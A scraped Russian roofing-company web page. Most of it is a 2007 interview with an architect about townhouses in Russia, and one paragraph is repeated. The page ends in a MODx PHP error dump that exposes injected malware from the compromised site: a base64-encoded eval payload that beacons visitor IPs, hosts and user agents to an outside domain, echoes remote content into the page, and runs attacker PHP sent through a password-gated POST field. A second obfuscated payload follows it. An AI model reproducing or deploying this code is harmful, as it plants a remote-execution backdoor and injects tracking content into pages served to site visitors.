Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

19/06/2007. Что такое таунхаус по-русски?

С каждым годом все больше людей задумываются о переезде из душного мегаполиса загород. Ближе к природе, дальше от суеты и выхлопных газов. Альтернативой квартирам выступили таунхаусы. Явление для России достаточно новое, но уже настолько популярное, что не считаться с ним просто не возможно. Действительно, если есть возможность жить со своей семьей в отдельном доме, с охраняемой территорией, при этом в транспортной доступности от города, становится понятно, почему количество желающих воспользоваться такой возможностью становится все больше.

Что такое таунхаусы, по какому принципу они возводятся и так ли хорош этот вид жилья? Эти и многие другие вопросы, мы задали руководителю архитектурного бюро «Архитекториум» Владимиру Николаевичу Биндеману:

- Владимир Николаевич, известно, что таунхаусы на западе - это собственный дом с небольшим участком в городе, а у российского потребителя таунхаусы ассоциируются с загородным домом. Каковы еще различия между отечественным и зарубежным таунхаусом?

- Различия лежат, прежде всего, именно в градостроительной ситуации. На Западе таунхаусы - это продолжение города, элемент городской застройки, причем застройки открытой, «прозрачной». У нас же уникальный российский продукт – поселок в отрыве от города, за охраняемым забором, состоящий из плотно поставленных таунхаусов.

Второе отличие заключается в историческом аспекте. В Англии, например, таунхаусы складывались зачастую на протяжении нескольких десятилетий, путем пристройки новых секций к уже существующим.

Нигде в мире малоэтажные блокированные жилые дома не образуют целые поселения, наоборот, они являются лишь составной частью жилой застройкой, между высотными домами и индивидуальными коттеджами.

- Если таунхаусы это образование целых поселков, то значит, они должны быть выполнены в одном архитектурном стиле, должны создавать единый ансамбль. Какие архитектурные требования выдвигаются к ним?

- Важно попытаться создать как можно более разнообразную жилую среду из типологически однородных элементов. Это непросто, особенно в условиях жесткого давления со стороны инвесторов, ставящих целью максимальное количество кв. метров. Разнообразие при стилевом единстве может быть достигнуто различными видами блокировок. Примером можно назвать строящийся по нашему проекту поселок Ново-Архангельское. При этом нужно не переступить ту грань, за которой стилевое единство переходит в однообразие.

- Какие факторы в первую очередь влияют на решение потребителя о приобретении того или иного дома, и какое место при этом отводится архитектуре?

- Как это не печально, одно из последних, после места, цены, площади, охраны и инфраструктуры. К сожалению, отечественный потребитель при выборе руководствуется главным образом бытовыми вопросами.

- По каким параметрам разделяют поселки таунхаусов на элитный, бизнес и средний классы?

- Существует стандартная риэлтерская сегментация, основанная на цене квадратного метра, на которую, в свою очередь помимо размера площади секций и дороговизны примененных стройматериалов влияет развитость инфраструктуры поселка,

наличие каких-либо дополнительных «опций», делающих проживание более удобным. И, конечно, местоположение, как первый индикатор в этом вопросе.

- Как Вы думаете, в будущем таунхаусы станут альтернативой квартирам как, например, в Америке?

- Для многих покупателей они уже и сейчас являются подобной альтернативой, отчасти из-за дороговизны квартир, отчасти из-за стремления жить в природном окружении, хотя бы и на 2-3-х сотках.

- С какими строительными, облицовочными, материалами для кровли вы привыкли и любите работать и, каких новинок от производителей ожидаете?

- Перспективным считаю применение «теплой керамики» для стен, развитие легкого каркасного домостроения, в котором существенную роль отвожу кровельным покрытиям, эстетичным и недорогим, простым в монтаже и надежным в эксплуатации. Кроме этого, перспективным считаю, увеличение доли деревянных конструкций и фасадных облицовок. Глобальных новинок, думаю, не предвидится, нужно углублять разработки по известным направлениям, совершенствовать технологии.

- Ваш прогноз на будущее, что будет модным, какие таунхаусы привлекут к себе потребителей?

- Прежде всего – неоднообразные, создающие гуманную среду проживания, интересные пространственные взаимосвязи внутри поселков. Если говорить об архитектурной стилистике, надеюсь, что доля вульгарного псевдоисторизма будет уменьшаться, а образцы выразительной современной архитектуры – множиться.

- Какой из необычных ваших проектов вы бы хотели воплотить в жизнь, насколько интересен он будет потребителям, инвесторам, участникам рынка?

- По предварительным оценкам – экономичное и технологичное решение. К сожалению, инвесторов отпугнула острота архитектурного решения, однако идея была отмечена на проведенном вашей компанией конкурсе «Пять фасадов частной архитектуры».

После этого мы использовали нашу разработку для проекта шумозащитного таунхауса, стеной-кровлей обращенного в сторону шумной автомагистрали.

Эта идея ждет своего инвестора.

- Часто ли Вы сталкиваетесь с тем, что владельцы изменяют внешний облик таунхаусов после покупки?

- Сталкиваемся с этим постоянно, сильно расстроены этой ситуацией, пытаемся находить понимание с инвесторами поселков и совместно составлять разумные регламенты проживания, ограничивающие хаотичную «перестроечную» активность.

- Жить за городом теперь хотят очень многие, спрос на таунхаусы среднего класса с каждым годом растет. Но недвижимость такого класса в Подмосковье почти не строится, в основном инвесторы обращают свое внимание на элитные участки с высокой стоимостью. Что сможет предложить им рынок в будущем?

- Как раз сейчас растет число предложений от инвесторов по проектированию именно недорогих таунхаусов (если стоимость в 300-400 тыс. долларов можно считать невысокой). Думаю, что как раз такие поселки будут развивать этот сегмент рынка в обозримом будущем.

- Владимир Николаевич, когда впервые появились таунхаусы в России?

– Одной из первых на российском рынке таунхаусы начала строить компания «Миэль-Недвижимость». Они предназначались для своих же сотрудников. В поселке «Ромашково» мы спроектировали несколько первых секций. Объемно-планировочное решение таунхауса очень однообразно: каждый из домов имеет две общих стены, получается, что на окружение «работают» только передний и задний фасады. Естественно, это существенно ограничивает архитектора, поэтому в первом же нашем проекте таунхаусов мы попробовали найти третий фасад – спроектировали плоскую кровлю, на которой организовали разноуровневые веранды. Но, к сожалению, покупатели не оценили это решение: кровли были очень быстро остеклены, причем не все по специально разработанному для этих целей проекту, а совершенно разными конструкциями.
Но с тех пор таунхаусы стали очень популярны среди потребителей и строятся практически на каждом подмосковном направлении.

Нигде в мире малоэтажные блокированные жилые дома не образуют целые поселения, наоборот, они являются лишь составной частью жилой застройкой, между высотными домами и индивидуальными коттеджами.

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0017 s(1 Requests)
  PHP: 0.3766 s 
  Total: 0.3783 s